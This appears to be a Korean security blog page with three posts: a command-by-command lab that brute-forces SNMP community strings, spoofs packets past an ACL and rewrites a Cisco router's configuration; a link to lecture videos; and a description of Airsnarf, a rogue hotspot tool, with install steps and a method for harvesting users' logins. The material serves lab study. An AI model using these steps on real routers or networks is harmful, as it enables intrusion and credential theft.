'해킹 및 보안 동영상'에 해당하는 글 3건

MIB (management information base) ; 관리 정보 베이스
    - 
모든 다른 MIB들은 기본 MIB의 확장판이다. MIB-I은 초기의 MIB 정의를 의미하며, 
        MIB-II는 현재의 정의를 가리킨다.
    - 객체들을 분류하는 식으로 OID가 정해져 있다. 
    - 다운로드 :


1.실습준비
    - GNS3 에 라우터를 하나 설정하자
        - 라우터를 사용할 IOS 이미지파일이 필요하다. ( c3725-adventerprisek9_sna-mz.124-11.T.bin )
        - Dynamips 와 비슷하게 설정하고 idlePC 도 설정해서 CPU를 낮추자!!!
        - console R0 해서 콘솔로 접속하자.
     
2. 실습환경     
                     R0 ( 192.168.2.250 )   라우터 ----------------------  공격자 ( 192.168.2.209 )
                                                                             |   
                       Victim ( 192.168.2.1 ) ----------------             
          
3. 실습1 ( 라우터의 running-config 정보를 취득해서 다시 내용을 변경해 라우터에 넣어보자..!!!! )
    0) 라우터 환경에서 
        - snmp 를 이용한다고 설정하자 .
        - (config#) # snmp-server community private rw

    1) 공격자 환경에서
        - snmp 서비스시스템 찾기
        - # nmap -sU -p 161 192.168.2.1-254 ( or 192.168.2.0/24)
        - 임의 디렉토리에가서 DIC사전 파일을 작성한다. (public, private, ILMI ...)
        - # vi snmp.dic
        - hydra 를 이용해서 라우터의 snmp 서버의 정보를 취득해 본다.
        - # hydra -P snmp.dic 192.168.2.250 snmp 
        - private 이나 public의 rw 권한을 가진것을 알아내자...
        - 공격자 컴에 TFTP 서버를 구동하여 라우터의 환경파일을 받아보자.
        - # start-tftp (실행시키면 메세지창으로 포트정보와 받을위치가 정보가 보여진다. 보통 /tmp )
        - # netstat -atnup (TFTP 정상으로 가동되는지 확인)
        - # cd /pentest/cisco/copy-router-config-v.0.1/ 이동하면 공격할 실행파일이 있다.
        - 이제 공격하기 전에 tshark 로 패킷을캡쳐하자.
        - 화면1 : 캡쳐준비
            - # tshark upd and port 161 -w snmp.pcap 
            - 캡쳐가 끝나면 함 보자.
            - # tshark -r 파일명
        - 화면2 : 공격
            - # copy-router-config.pl 192.168.2.250 192.168.2.209 private
            - 파일을 정상으로 받았을 것이다 . 이것을 hostname을 바꺼서 다시 보내보자.
            - # vi /tmp/ pwnd-router.config
            - # merge-router-config.pl 192.168.2.250 192.168.2.209 private
    
    3) 라우터 콘솔에 보면 hostname이 변경되어 있을 것이다. 
  
    --------------------------------------------------------------------------------------------------------------------------------------------

4. 실습2 ( 라우터에 특정 IP만 permit 을 줘서 공격자가 못들어오게 막고 그것을 우회해 보자. )
    0). 그전에 관련된 공격 소프트웨어를 Backtrack에 설치해 주자....
        - 다운로드 : tcpreplay-3.4.0.tar.gz
        - # cd /pentet/cisco/안에 또는 특정디렉토리에 카피해 넣자.
        - # tar -xvzf 파일면 (압축풀기)
        - # ./configure     (컴파일하기)
        - # make             (install 준비)
        - # make install  (install)
        

    1) 라우터 환경에서
        - AccessList 작성
        - (config#) # access-list 1 permit 192.168.2.1
        - (config#) # snmp-server community private rw 10
    2) 공격자 환경에서 
        - 아래의 공격시도를 해보아도 막혀있어서 snmp의 정보를 가져올 수 없을 것이다.
        - # hydra -P snmp.dict 192.168.2.250 snmp 
        - 화면1 : arpspoof 작동
            - 패킷을 받기위해 arpspoof 공격을 걸어놓고 작업을 진행하자.
            - # arpspoof -t 192.168.2.250 192.168.2.1
        - 화면2 : 패킷을 캡쳐하자 
            - # tshark -i eth0 -w hydra.pcap udp and port 161
        - 화면3 : 다시 hydra 공격을 해보자 캡쳐뜨기 위해....
            - # hydra -P snmp.dic 192.168.2.250 snmp
            - 공격은 실패하지만 캡쳐가 되어 있을것이다.
        - 화면2 : 캡쳐파일내용의 soure IP 를 192.168.2.1로 바꺼보자. 
            - # tcpwrite -i hydra.pcap -o hydra_2.pcap -S 192.168.2.209 192.168.2.1 -C
        - 화면3 : 이번엔 wireshark를 기동해서 패킷이 오는것을 받아 분석해 보자.
            - # wireshark 
        - 화면2 : 자 모든준비가 되었으니 tcpreplay 를 해보자.
            - # tcpreplay -i eth0 hydra_2.pcap
        - wireshark 로 분석해보면 private(다른것일수도 있음) 라는 snmp 의 community string을 볼 수있을 것이다.
          이것을 이용해 다시 한번 라우터의 환경설정파일을 받아 조금 장난 쳐서 다시 보내보자.
    
    3) 이제 comunity string (private이라던가)을 알아냈으니 공격을 다시 시도해 보자.
        - 이번엔 특별히 arpspoof  공격은 필요없을 것이다.
        - 화면1 : 화면캡쳐을 해놓고 대기하자. ( 패킷 하나만 받아보자.)
            - # tshark -i eth0 -c 1 -w config2.pcap udp and prot 161
        - 화면2 : 다운로드를 해보자 (안돼겟지만 IP때문에....막혀있어서 ..하지만 캡쳐를 위해)
            - # copy-router-config.pl 192.168.2.250 192.168.2.209 private
        - 화면1 : 실패한 패킷 캡쳐한 파일에 IP를 수정해서 다시 시도해보자.
            - # tcpwrite -i config2.pcap -o config2_m.pcap -S 192.168.2.209 192.168.2.1 -C
            - # tcpreplay -i eth0 config2_m.pcap 
       - 화면1 : 그럼 TFTP서버로 지정한 /tmp폴더에 라우터의 환경설정파일이 들어있을 것이다.
                    약간 변조해 보자 (hostname 정도)
       - 화면1 : 이번엔 변조한 파일을 올려보자 (먼저 캡쳐준비를위해, 처음엔 실패할거니까)
           - # tshark -i eth0 -c 1 -w config3.pcap udp and prot 161
       - 화면2 : 업로드를 해보자 (안돼겟지만 IP때문에....막혀있어서 ..하지만 캡쳐를 위해)
            - # merge-router-config.pl 192.168.2.250 192.168.2.209 private
       - 화면1 : 실패한 패킷 캡쳐한 파일에 IP를 수정해서 다시 시도해보자.
            - # tcpwrite -i config3.pcap -o config3_m.pcap -S 192.168.2.209 192.168.2.1 -C
            - # tcpreplay -i eth0 config3_m.pcap 
  
    4) 라우터 콘솔에 보면 hostname이 변경되어 있을 것이다. 


WRITTEN BY
미소틱한남자
보다 즐겁게 살고 싶은 미쏘팅이 블로그~

받은 트랙백이 없고 , 댓글이 없습니다.
secret

안철수 박사의 예전 특강 자료입니다.

두개 동영상 해서 1시간이 조금 넘는 동영상 입니다.

현재까지 안철수 연구소의 자취 및 역사  그리고 박사님의 노하우 등에 대해서 공부할 수 있는 기회 인것 같습니다.

아래 링크로 올려 드리겠습니다.

강의 1           강의 2

WRITTEN BY
미소틱한남자
보다 즐겁게 살고 싶은 미쏘팅이 블로그~

받은 트랙백이 없고 , 댓글이 없습니다.
secret

Download the DefCon XI presentation HERE

Download the Airsnarf tarball for Red Hat Linux 9.0 HERE

Download the Airsnarf tarball for OpenZaurus 3.2 HERE

Download Hot Spot Defense Kit for Mac OS X HERE

Download the Black Hat Federal 2003 presentation HERE

Download the Hot Spot Defense Kit for Windows XP HERE.

Read how to set up an Airsnarf on Windows XP HERE

New! Download the Black Hat 2005 "Rogue Squadron" presentation HERE

New! Check out the Airsnarf Rogue Squadron firmware for the WRT54G HERE

Airsnarf - A rogue AP setup utility

0.2

The Shmoo Group

http://www.shmoo.com

Airsnarf is a simple rogue wireless access point setup utility designed to demonstrate how a rogue AP can steal usernames and passwords from public wireless hotspots. Airsnarf was developed and released to demonstrate an inherent vulnerability of public 802.11b hotspots--snarfing usernames and passwords by confusing users with DNS and HTTP redirects from a competing AP.

In response to the threat posed by rogue access points, we've also developed a hot spot defense kit to assist users in detecting wireless attackers. HotSpotDK checks for changes in ESSID, MAC address of the access point, MAC address of the default gateway, and radical signal strength fluctuations. Upon detecting a problem, HotSpotDK notifies the user that an attacker may be on the wireless network. Currently HotSpotDK runs on Mac OS X and Windows XP.

Airsnarf has been tested with (i.e. probably requires) the following:

Red Hat Linux 9.0 - http://www.redhat.com/

kernel-2.4.20-13.9.HOSTAP.i686.rpm - http://www.cat.pdx.edu/~baera/redhat_hostap/

iptables - Red Hat 9.0 CD 1

httpd - Red Hat 9.0 CD 1

dhcp - Red Hat 9.0 CD 2

sendmail - Red Hat 9.0 CD 1

Net::DNS Perl module - http://www.cpan.org/

Install & run Airsnarf with the following commands:

tar zxvf airsnarf-0.2.tar.gz

cd ./airsnarf-0.2

./airsnarf

How does it work? Basically, it's just a shell ...

"노트북에 무선 랜카드를 끼고 핫스팟에 가서 자리잡고 앉아 있기만 하면 옆에 앉아있는 사람들의 유저네임과 패스워드가 알아서 척척 들어온다..." 무선 해킹툴의 트랜드를 오픈하는 신호탄인가요. 어제 미국 @stake사의 영국인 연구원 올리 화이트하우스가 블루투스를 해킹하는 툴 "Red Fang"을 개발했다는 소식을 들었습니다. 802.11 무선 네트워크를 사용하는 사람들의 수가 폭발적으로 증가하는 요즘, 겨우 15미터 반경에서 디바이스에 접속하는 블루투스 해킹툴이 과연 얼마나 대중성(?)을 가질지는 의문입니다만... 이에 비하면 8월 초 라스베가스에서 열린 데프콘에서 발표된 Airsnarf는 Red Fang의 진화된 버전이라 할 수 있을 겁니다. "Bruceforter", "Think Tank" 등의 칭호를 듣고 있는 Shmoo 그룹이 제작한 Airsnarf를 소개드립니다:

==============
Airsnarf는 무선 AP 설정 유틸리티로, 공공 무선 핫스팟에서 유저네임과 패스워드를 훔치는 것이 얼마나 쉬운지를 보여준다. Airsnaft는 다른 AP를 이용, DNS와 HTTP 리다이렉트로 사용자를 혼동시켜 유저네임과 패스워드를 입력하게 하는 방법으로 공공 802.11b 핫스팟의 취약점을 증명한다.

Airsnarf는 다음 시스템에서 테스트되었다:

    레드햇 리눅스 9.0 - http://www.redhat.com
    커널-2.4.20-13.9.HOSTAP.i686.rpm - http://www.cat.pdx.edu/~baera/redhat_hostap/
    iptables - 레드햇 9.0 CD 1
    httpd - 레드햇 9.0 CD 1
    dhcp - 레드햇 9.0 CD 2
    sendmail - 레드햇 9.0 CD 1
    Net::DNS Perl 모듈 - http://www.cpan.org/

Airsnarf는 다음과 같이 설치/실행한다:
    tar zxvf airsnarf-0.2.tar.gz
    cd ./airsnarf-0.2
    ./airsnarf

기본적으로 Airsnarf는 전용 포털로 완성된 다른 핫스팟을 생성하게 하는 쉘 스크립트에 불과하다. 위조된 로컬 네트워크, 게이트웨이, SSID 등의 "변수"는 ./cfg/airsnarf.cfg 파일에서 설정할 수 있다. 옵션으로, Airsnart 커맨드 라인 독립변수로 자신만의 airsnarf.cfg, html, cgi-bin을 포함하는 디렉토리를 지정할 수도 있다.

Airsnarf AP에 연결을 시도하는 무선 클라이언트는 다른 핫스팟과 마찬가지로 Airsnarf로부터 IP, DNS, 게이트워이를 받는다.

사용자는 자신의 DNS 설정에 상관없이 모든 DNS 쿼리를 사용해 주어진 IP를 DNS를 전환하려 할 것이다. 따라서 사용자가 어떤 웹사이트를 방문하려 해도 유저네임과 패스워드를 묻는 Airsnarf 의 페이지로 가게 된다. 사용자가 별 의심 없이 입력한 유저네임과 패스워드는 메일로 root@localhost에게 보내진다. 이렇게 되는 이유는 다음과 같다:
    1) 위조된 AP는 합법적인 AP를 가장할 수 있다.
    2) AP 인증 수단이 없는 사용자는 유저네임과 패스워드를 물으면 핫스팟 사용을 포기할 것이다.

이것을 이용해 무엇을 할 수 있는가? 국내에서 잘 알려진, 유료 핫스팟 같은 "가짜 웹사이트"를 생성할 수 있다. index.html 파일을 바꾸기만 하면 간단하다. 마음대로 페이지를 위조하되, 폼 필드 변수가 airsnarf.cgi를 가리키게 하는 것만 유의하면 된다. 그런 뒤 핫스팟에 가서 앉아 있는다. 핫스팟 사용자들은 접속할 것이고, 핫스팟 공급자의 네트워크에서 사용하는 유저네임과 패스워드를 입력할 것이다. 이 유저네임과 패스워드는 전국 어디서나 같은 공급자가 제공하는 핫스팟에서 사용될 수 있고, 사용료는 오리지널 사용자가 고스란히 부담하게 된다. 만일 사용자가 분당 계산되는 요금제 사용자라면 요금 청구서를 받았을 때 뭔가 잘못되었다는 것을 깨닫게 될 것이다. 하지만 정액 요금제를 사용하는 사용자라면 자신의 유저네임과 패스워드가 도용되고 있다는 사실을 절대 모를 것이다.

무선 핫스팟 운영자는 강력한 인증 메카니즘, 일회용 인증 설정, AP의 상태와 생성 여부를 모니터링 하는 등등을 고려해야 할 것이다. 아니면, 도용당할 위험을 제거하는 방법으로 핫스팟 접속을 무료로 제공하는 방법도 있다.

AirSnarf



WRITTEN BY
미소틱한남자
보다 즐겁게 살고 싶은 미쏘팅이 블로그~

받은 트랙백이 없고 , 댓글이 없습니다.
secret